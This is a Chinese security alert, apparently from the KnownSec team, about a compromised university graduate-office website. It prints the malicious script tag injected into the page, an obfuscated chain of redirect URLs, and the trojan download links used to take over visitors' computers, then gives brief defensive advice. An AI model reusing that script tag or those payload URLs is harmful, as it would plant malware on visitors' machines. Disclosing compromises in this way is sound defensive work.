注册
登录
| 关键词: http frame 3322 org script fdd htm tongji graduate 恶意 |
知道创宇安全团队(KnownSec Team)于今天捕获 湖南科技大学研究生处(http://graduate.hnust.cn)被植入恶意代码。 用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。 MalUrl:http://graduate.hnust.cn 网页被嵌入恶意链接代码: <script src=http://3god.ne%74/c.js></script> 挂马分析: [wide]http://graduate.hnust.cn/ [script]http://3god.ne%74/c.js [frame]http://df5fdd.3322.org/aa/a100.htm [frame]http://df5fdd.3322.org/aa/index.htm [frame]http://df5fdd.3322.org/aa/nyntd14.htm [frame]http://df5fdd.3322.org/aa/nyntdfll.htm [frame]http://df5fdd.3322.org/aa/of.htm [frame]http://df5fdd.3322.org/aa/nyntdi.htm [frame]http://df5fdd.3322.org/aa/huoh.htm [script]http://js.tongji.linezing.com/1235552/tongji.js [script]http://s6.cnzz.com/stat.php?id=1408284&web_id=1408284 [script]http://%33%67%6f%64%2e%6e%65%74/%73%2e%6a%73 [frame]http://df5fdd.3322.org/aa/a100.htm [script]http://js.tongji.linezing.com/1136402/tongji.js 最终下载病毒文件: http://mstsc2005.com/qq.exe http://www.twin-2009.com/svchost.exe 通过执行以上病毒文件,来达到完全控制访问者的系统。 该网站历史挂马次数:3 Google对该网站的判定:安全 知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/ 推荐的应对方法: 1.安装客户端保护软件。 2.检查更新windows及第三方软件补丁程序。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
